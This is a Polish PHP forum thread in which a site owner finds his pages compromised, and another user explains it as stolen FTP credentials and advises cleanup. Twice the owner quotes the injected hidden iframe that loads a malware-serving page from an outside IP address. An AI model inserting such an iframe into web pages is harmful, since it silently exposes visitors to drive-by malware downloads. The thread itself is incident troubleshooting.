Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP]Bardzo dziwny problem!
Forum PHP.pl > Forum > Przedszkole
DOmN
Otóż mam 3 seriwsy położone na niezależnych seriwsach. Jeden to portal w CMS na cba.pl, drugi to forum phpBB by przemo na yoyo.pl a trzeci to strona w php.

Wczoraj wszystko działało normalnie, nic od dawna zresztą nie robiłem. Dopiero dzisiaj to wyskoczyło.
Portal w CMS na cba.pl. Problem jest taki że jest tylko biały ekran i na dole napis:
Cytat
Darmowy Hosting CBA.PL

Forum na yoyo.pl: Wywala mi:
Cytat
Parse error: syntax error, unexpected '?' in /var/www/sites/yoyo.pl/r/a/raccoons/common.php on line 396

Z kolei ostatni problem to strona w php na płatnym serwerze w Active 24. Niby wszystko działa, ale nad nagłówkiem pojawiła mi się wolna przestrzeń, pod nagłówkiem też. Zerknąłem w kod i pojawiło mi się coś takiego:
Kod
<iframe src="http://66.96.85.221/base/forum2/index.php" width=100 height=80 style="visibility:hidden"></iframe>

Oprócz tego mam taki obiekt gdzie wyświetla mi ostatnie posty z forum i tam widnieje coś takiego:
Kod
Parse error: syntax error, unexpected '<' in /virtual/pl/com/xiaolin-showdown/last.php on line 128

Proszę pilnie o pomoc!
l0ud
To stało się jednocześnie?

Prawdopodobnie masz wirusy na komputerze, bądź łączyłeś się na konta FTP z innego, zawirusowanego komputera. Być może poprzez pirackiego klienta FTP.

W tej chwili najrozsądniejszym wyjściem byłoby przeskanowanie komputera (ew. zmiana klienta ftp), zmiana haseł i wgranie wszystkiego od nowa... A już na pewno przywrócenie poprzednich wersji tych plików, na jakie wskazują błędy.
(to iframe to kod ściągający wirusa przez zapewne jakąś dziurę w pdf'ie)
DOmN
Cytat
?<html><body><iframe src="http://66.96.85.221/base/forum2/index.php" width=100 height=80 style="visibility:hidden"></iframe></body></html>>

Przy okazji znalazłem to również na mojej stronie położonej na yoyo.pl.
Największy problem w tym, że na te serwisy na cba.pl i yoyo.pl nie logowałem się od dawna na ftp. To stało się dzisiaj, a dzisiaj nic nie robiłem. Wczoraj wszystko normalnie działało.
Chyba mam wirusa bo co kilka chwil przycina mi się.
DOmN
Udało mi się na dwóch swoich stronach to naprawić. FTP mam legalnego - Total Commander, mój komp miał parę wirusów, ale już się ich pozbyłem. Tylko że nie mogłem zarazić tych stron na yoyo.pl i cba.pl ponieważ, nie logowałem się na nie od dawna. Najważniejsze że jakoś to naprawiłem. Tylko nadal nie wiem jak to się stało. W podejrzanie miejsca nie wchodzę, wczoraj wieczorem wszystko działało, a dzisiaj rano od razu jak wszedłem...errory.
l0ud
Wirus mógł przy uaktywnieniu ściągnąć hasła zapisane w total commanderze i ich użyć. Mogła go mieć też inna osoba, znająca hasła.
DOmN
Tak czy inaczej zmieniłem hasła, chociaż portalu w CMS położonego na cba.pl nadal nie udało mi się naprawić, pewnie dlatego, że nie wiem ile plików zostało zarażonych. Chyba już wiem, jak zaraziłem. Wczoraj chciałem nabić licznik w pewnym miejscu i pootwierałem masę bramek proxy. Pewnie jakaś była zawirusowana.
Wirusów na kompie też się pozbyłem, było kilka zarażonych plików przez jakiegoś trojana i rootkita.
Swoją drogą zauważyłem, bo dla bezpieczeństwa otwierałem te strony w trakcie naprawiania pod Win98 i jak wszedłem na jedną z nich, to chciał pobrać z adresu, który podałem w temacie, plik pdf o tytule license.
Dziękuję za pomoc! guitar.gif
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.